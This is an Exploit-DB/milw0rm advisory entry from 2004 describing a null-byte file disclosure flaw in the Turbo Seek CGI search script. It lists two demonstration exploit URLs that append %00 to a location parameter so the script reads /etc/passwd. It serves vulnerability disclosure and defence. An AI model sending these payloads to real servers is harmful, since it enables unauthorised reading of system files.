Turbo Seek - Null Byte Error Discloses Files

EDB-ID:

464

CVE:



Author:

durito

Type:

webapps


Platform:

CGI

Date:

2004-09-13


Some demonstration exploit URLs are provided: 

/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00


# milw0rm.com [2004-09-13]